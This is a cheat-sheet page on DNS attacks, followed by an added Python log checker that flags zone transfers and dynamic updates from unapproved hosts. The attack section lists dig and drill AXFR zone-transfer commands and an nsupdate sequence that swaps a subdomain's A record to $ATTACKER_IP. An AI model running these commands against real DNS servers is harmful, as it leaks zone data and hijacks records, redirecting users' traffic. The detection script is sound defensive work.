killchain-compendium/Enumeration/DNS.md


DNS

Subdomain Enumeration

  • Get all the records in the zone by requesting a zone transfer (AXFR) from the target DNS server
dig     @$TARGET_DNS $DOMAIN axfr
drill   @$TARGET_DNS $DOMAIN axfr

Join a Domain

  • Join a Windows domain by setting the A record to the attacker's IP; needs a cert and private key
nsupdate
server <DNS-IP>
update delete <sub.domain.com>
update add <sub.domain.com> 1234 A $ATTACKER_IP
send
quit
  • Check the domain by querying the subdomain's A record via dig, drill or nslookup
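
Detection side of both sections above (the AXFR request and the nsupdate record swap), as an added example that is not part of the original cheat sheet: a log check that reports zone transfers and dynamic updates from hosts that are not approved for them. The log patterns are modelled on BIND 9 messages and are an assumption, as are the allow-listed addresses, the zone name and the function names; the sample log lines are constructed.

```python
import re
from ipaddress import ip_address, ip_network

# Assumptions: placeholder addresses for the hosts allowed to transfer/update.
ALLOWED_XFER = [ip_network("192.0.2.53/32")]    # secondary name server
ALLOWED_UPDATE = [ip_network("192.0.2.10/32")]  # DHCP server / domain controller

# Patterns modelled on BIND 9 log messages (assumption); adapt to your server.
CLIENT = r"client (?:@0x[0-9a-f]+ )?(?P<ip>[0-9A-Fa-f.:]+)#\d+"
RULES = [(kind, re.compile(CLIENT + rx)) for kind, rx in [
    ("axfr", r".*transfer of '(?P<zone>[^/']+)/IN': AXFR started"),
    ("axfr-denied", r".*zone transfer '(?P<zone>[^/']+)/AXFR/IN' denied"),
    ("update", r".*updating zone '(?P<zone>[^/']+)/IN': (?P<op>adding|deleting)"
               r" (?:an RR|rrset) at '(?P<name>[^']+)'"),
    ("update-denied", r".*update '(?P<zone>[^/']+)/IN' denied"),
]]

# Constructed sample log lines, not taken from a real server.
SAMPLE_LOG = [
    "10:01:02 xfer-out: info: client @0x7f1 192.0.2.53#40112 (corp.example): transfer of 'corp.example/IN': AXFR started (serial 7)",
    "10:05:44 xfer-out: info: client @0x7f2 198.51.100.7#51822 (corp.example): transfer of 'corp.example/IN': AXFR started (serial 7)",
    "10:06:10 security: error: client @0x7f3 198.51.100.7#51830 (corp.example): zone transfer 'corp.example/AXFR/IN' denied",
    "10:09:12 update: info: client @0x7f4 198.51.100.7#38211: updating zone 'corp.example/IN': deleting rrset at 'mail.corp.example' A",
    "10:09:12 update: info: client @0x7f4 198.51.100.7#38211: updating zone 'corp.example/IN': adding an RR at 'mail.corp.example' A 198.51.100.7",
    "10:11:00 update: info: client @0x7f5 192.0.2.10#40000: updating zone 'corp.example/IN': adding an RR at 'pc1.corp.example' A 192.0.2.77",
]

def find_alerts(lines):
    """Return (kind, client_ip, zone, detail) for events from unapproved hosts."""
    alerts = []
    for line in lines:
        for kind, rx in RULES:
            m = rx.search(line)
            if m is None:
                continue
            nets = ALLOWED_XFER if kind.startswith("axfr") else ALLOWED_UPDATE
            if not any(ip_address(m["ip"]) in net for net in nets):
                detail = f"{m['op']} {m['name']}" if kind == "update" else ""
                alerts.append((kind, m["ip"], m["zone"], detail))
            break
    return alerts

def replaced_names(alerts):
    """Names that an unapproved client both deleted and re-added (record swap)."""
    seen = {}
    for kind, ip, _zone, detail in alerts:
        if kind == "update":
            op, name = detail.split(" ", 1)
            seen.setdefault((ip, name), set()).add(op)
    return sorted(n for (_ip, n), ops in seen.items() if ops == {"adding", "deleting"})
```

A successful `axfr` or `update` alert means the server accepted the request, so the matching access control on the zone needs tightening, not only the source investigated.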